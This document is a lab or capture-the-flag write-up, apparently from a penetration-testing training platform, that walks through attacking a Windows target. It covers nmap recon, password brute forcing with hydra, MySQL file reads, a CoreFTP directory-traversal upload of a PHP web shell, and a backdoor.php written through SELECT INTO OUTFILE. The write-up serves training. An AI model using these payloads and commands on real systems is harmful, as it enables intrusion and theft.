# Recon - Add domain to `/etc/hosts` - Ping is a bit wonky, maybe the remote host is buggy? ![[images/Pasted image 20251020140702.png]]![[images/Pasted image 20251020141402.png]] - Light nmap scan with -Pn flag ![[images/Pasted image 20251020141419.png]] - Detailed nmap scan ![[images/Pasted image 20251020141759.png]]![[images/Pasted image 20251020141836.png]] - OS nmap scan - UDP nmap scan - Nmap scan with tracing `--packet-trace -Pn -n --disable-arp-ping --reason` - Dig fails # Enumeration - FTP null session attempts ![[images/Pasted image 20251020142003.png]] ![[images/Pasted image 20251020142011.png]] - Try to pluck username with `smtp-user-enum` - `[email protected]` is in play ![[images/Pasted image 20251020142308.png]] - Try to brute force smtp with hydra - failure with given `pws.list` ![[images/Pasted image 20251020142519.png]] - try again with `rockyou.txt` ![[images/Pasted image 20251020142544.png]] - Try to get into ftp with fiona:987654321 ![[images/Pasted image 20251020142938.png]]![[images/Pasted image 20251020143625.png]] - grab all files with wget ![[images/Pasted image 20251020143255.png]] - looks like a dead end? ![[images/Pasted image 20251020143419.png]] - try to get into mysql - got some TLS/SSL errors and needed to add `--skip-ssl` flag ![[images/Pasted image 20251020143920.png]]![[images/Pasted image 20251020144350.png]]![[images/Pasted image 20251020144748.png]] - try to get into rdp - failures ![[images/Pasted image 20251020150254.png]]![[images/Pasted image 20251020150308.png]] - ![[images/Pasted image 20251020150659.png]] - attempt to crack hash from mysql with `-m 300` for mysql - too lengthy ![[images/Pasted image 20251020150907.png]] - try john - determine format with `john --list=formats |grep -i mysql` ![[images/Pasted image 20251020151043.png]] - error ![[images/Pasted image 20251020151151.png]] # Exploit - A - Within, mysql check `SHOW VARIABLES LIKE “secure_file_priv”;` - If the value is null, we can arbitrarily read from the fs and write to the fs - Now simply read the flag `SELECT LOAD_FILE(“C:/Users/Administrator/Desktop/flag.txt”);` ```mysql SHOW VARIABLES LIKE “secure_file_priv”; SELECT LOAD_FILE(“C:/Users/Administrator/Desktop/flag.txt”); ``` ![[images/Pasted image 20251020202416.png]] # Exploit - B - Coreftp version 2.0 build 725 based on nmap scan and doc in ftp share ![[images/Pasted image 20251020151906.png]] - run `searchploit` on `coreftp` base don files found in ftp share ![[images/Pasted image 20251020151516.png]] - copy to local directory with `searchsploit -m <module_name.txt>` ![[images/Pasted image 20251020151541.png]] - PoC works ![[images/Pasted image 20251020182444.png]] - Now let's try a php web shell - Use directory traversal to place in `/xammp/htdocs` - `Apache` directory is at `C:\xampp\htdocs\` ```bash curl -k -X PUT -H "Host: <target_ip>" --basic -u fiona:987654321 --data-binary "<?php echo shell_exec($_GET["cmd"])?>" --path-as-is https:/<target_ip>/../../../../../xampp/htdocs/shellx.php ``` ![[images/Pasted image 20251020200434.png]] - running into an error with `shell_exec()` - read with http ```bash curl -w "\n" http://<target_ip>/shellx.php?cmd=type%20C:\users\administrator\desktop\flag.txt ``` ![[images/Pasted image 20251020200820.png]] # Exploit - C - Inject file into mysql db, then use web shell - `SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\backdoor.php"` ```mysql SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\backdoor.php ``` - Visit https://<target_ip>:443/backdoor.php - Add arbitrary commands after backdoor.php?cmd - For example http://inlanefreight.htb/backdoor.php?c=dir%20C:\Users\Administrator\Desktop - Note Windows OS - Or grab with curl via http ```bash curl -w "\n" http://<target_ip>.php?cmd=type%20C:\\users\\administrator\\desktop\\flag.txt ```